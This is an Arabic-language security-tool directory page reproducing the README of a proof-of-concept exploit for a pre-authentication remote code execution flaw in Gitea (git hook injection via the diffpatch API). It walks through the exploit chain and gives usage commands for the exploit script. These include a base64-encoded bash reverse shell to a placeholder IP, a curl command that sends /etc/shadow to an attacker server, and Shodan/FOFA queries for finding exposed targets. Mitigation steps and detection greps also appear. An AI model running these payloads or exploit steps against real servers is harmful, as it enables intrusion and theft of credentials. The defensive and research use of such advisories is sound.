Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-60004-POC — CVE-2026-60004 — استغلال RCE قبل المصادقة — Gitea <= 1.27.0 — حقن خطاف git عبر diffpatch (CVSS 9.8) | Kitploit
أدوات/GitHubGitHub/imbas007/cve-2026-60004-poc
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubimbas007/cve-2026-60004-poc

CVE-2026-60004-POC

CVE-2026-60004 — استغلال RCE قبل المصادقة — Gitea <= 1.27.0 — حقن خطاف git عبر diffpatch (CVSS 9.8)

عرض المستودع
11414منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-60004 — تنفيذ التعليمات البرمجية عن بُعد قبل المصادقة في Gitea (CVSS 9.8)

┌──────────────────────────────────────────────────────────────┐
│  CVE-2026-60004  │  Gitea Pre-Auth RCE  │  CVSS 9.8 (CRIT)   │
│  diffpatch → git hook injection  │  v1.17–1.27.0 affected    │
└──────────────────────────────────────────────────────────────┘

📋 نظرة عامة

الخاصيةالتفاصيل
معرف CVECVE-2026-60004
درجة CVSS9.8 (حرجة)
CWECWE-94 (حقن الكود)
الإصدارات المتأثرةGitea 1.17 حتى 1.27.0
الإصدار المُصحَّحGitea 1.27.1 (صدر في 27 يوليو 2026)
نقطة النهاية المعرَّضةPOST /api/v1/repos/{owner}/{repo}/diffpatch
اكتشفهاShai Rod (NightRang3r)
درجة EPSS0.95 (احتمالية استغلال 95%)

🔬 تفاصيل الثغرة

تستغل الثغرة الطريقة التي تعالج بها نقطة نهاية diffpatch في Gitea رقع Git المقدمة من المستخدم:

  1. فخ الاستنساخ العاري — تنشئ نقطة النهاية استنساخًا مؤقتًا عارياً (bare) (بدون شجرة عمل)، مما يعني أن دليلها الجذر هو $GIT_DIR.

  2. معالجة الرقعة — يتم استدعاء git apply مع الأعلام: --index و--recount و--cached و--binary، و (مع Git ≥ 2.32) -3 للتراجع إلى الدمج ثلاثي الاتجاهات.

  3. تصادم Add/Add — من خلال إرسال نفس الرقعة الخبيثة مرتين، يُحدث المهاجم تعارض add/add. يكتب التراجع ثلاثي الاتجاهات في Git مسار الملف من الرقعة إلى القرص — متجاوزًا قيد --cached.

  4. حقن الخطاف — يصوغ المهاجم الرقعة بحيث يكون مسار الملف هو hooks/post-index-change. ولأن الاستنساخ عارٍ، فيستقر هذا الملف مباشرةً في دليل خطافات Git.

  5. تنفيذ الكود — عندما يحدّث Git الفهرس، ينفّذ تلقائيًا خطاف post-index-change، مشغّلًا أوامر الصدفة الخاصة بالمهاجم بصلاحية حساب خدمة Gitea.

مخطط سلسلة الاستغلال

Attacker                              Gitea Server
   │                                      │
   ├─ POST /user/sign_up ────────────────►│  Register new user
   │                                      │
   ├─ POST /api/v1/user/repos ───────────►│  Create private repo (auto-init)
   │                                      │
   ├─ GET /api/v1/repos/.../branches ────►│  Get commit SHA
   │                                      │
   ├─ POST /api/v1/repos/.../diffpatch ──►│  1st patch: plant hook
   │                                      │  Git creates bare clone
   │                                      │  Applies patch (--cached)
   │                                      │
   ├─ POST /api/v1/repos/.../diffpatch ──►│  2nd patch: SAME PATCH
   │   (same exact patch!)                │  ADD/ADD COLLISION!
   │                                      │  Git -3 fallback writes to disk
   │                                      │  hooks/post-index-change created
   │                                      │  Git fires post-index-change hook!
   │                                      │  ┌─ Command executes ─┐
   │                                      │  │ reads /etc/passwd  │
   │                                      │  │ stores in git blob │
   │                                      │  │ creates rce-proof  │
   │                                      │  │ branch             │
   │                                      │  └────────────────────┘
   │                                      │
   ├─ GET /api/v1/repos/.../raw/proof ───►│  Retrieve output
   │◄─────────────────────────────────────┤  /etc/passwd contents
   │                                      │

🚀 البدء السريع

PoC بلغة Python (cve-2026-60004-poc.py)

# Install dependencies (uses stdlib only — no pip needed!)
# Python 3.7+ required

# Quick one-liner
python3 cve-2026-60004-poc.py --url http://target --cmd "id"

# Mode 1: Full-Auto (register + create + exploit + retrieve)
python3 cve-2026-60004-poc.py --url http://target:3000 --mode full-auto

# Mode 2: Semi-Auto (existing credentials)
python3 cve-2026-60004-poc.py --url http://target:3000 --mode semi-auto \
    --user myuser --pw 'MyPass123!'

# Mode 3: Manual (existing user + repo)
python3 cve-2026-60004-poc.py --url http://target:3000 --mode manual \
    --user myuser --pw 'MyPass123!' --repo existing-repo

# Mode 4: Check Only (non-intrusive detection)
python3 cve-2026-60004-poc.py --url http://target:3000 --mode check
image

أوامر مخصصة

# Execute custom command
python3 cve-2026-60004-poc.py --url http://target:3000 --mode full-auto \
    --cmd "whoami; id; env"

# Reverse shell (base64 encoded)
PAYLOAD=$(echo -n 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1' | base64)
python3 cve-2026-60004-poc.py --url http://target:3000 --mode full-auto \
    --cmd "echo $PAYLOAD | base64 -d | bash"

# Exfiltrate data via curl
python3 cve-2026-60004-poc.py --url http://target:3000 --mode full-auto \
    --cmd "curl http://your-server/$(cat /etc/shadow | base64 -w0)"

قالب Nuclei

# Run against a single target
nuclei -t CVE-2026-60004.yaml -u http://target:3000

# Run against multiple targets
nuclei -t CVE-2026-60004.yaml -l targets.txt -o results.txt

# With debugging output
nuclei -t CVE-2026-60004.yaml -u http://target:3000 -debug -v

🛡️ التخفيف

إجراءات فورية

  1. حدّث Gitea إلى الإصدار 1.27.1 أو أحدث:

    # Docker
    docker pull gitea/gitea:1.27.1
    # Binary
    wget https://dl.gitea.com/gitea/1.27.1/gitea-1.27.1-linux-amd64
    
  2. عطّل التسجيل المفتوح (يقلل من سطح الهجوم):

    # app.ini
    [service]
    DISABLE_REGISTRATION = true
    
  3. شغّل Gitea بحساب خدمة بأقل الصلاحيات اللازمة

  4. راقب طلبات POST المتكررة إلى منفذ diffpatch

استعلامات الكشف

# Search for diffpatch abuse in Gitea logs
grep -E "POST.*diffpatch" /var/lib/gitea/log/gitea.log

# Check for suspicious repo creation + immediate diffpatch use
grep -E "(CreateRepository|diffpatch)" /var/lib/gitea/log/gitea.log

🔍 استعلامات Shodan / FOFA

# Shodan
http.title:"Gitea"
http.favicon.hash:5247710

# FOFA
app="Gitea"
title="Gitea"

# Censys
services.software.product:"Gitea"

📚 المراجع

  • استشارة أمان GitHub (GHSA-rcr6-4jqh-j84m)
  • مستودع PoC الخاص بـ EQSTLab
  • سجل NVD
  • قالب Nuclei من ProjectDiscovery
  • ملاحظات إصدار Gitea 1.27.1

⚠️ إخلاء المسؤولية

هذه الأداة مقدمة لأغراض تعليمية ولاختبارات الأمان المصرح بها فقط. استخدمها فقط ضد الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وقد ينتهك:

  • قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) — الولايات المتحدة
  • قانون إساءة استخدام الحاسوب لعام 1990 — المملكة المتحدة
  • قوانين مماثلة في ولايات قضائية أخرى

لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذه الأداة.

📄 الترخيص

رخصة MIT — راجع مستودع EQSTLab للتفاصيل.

تنزيل الأداة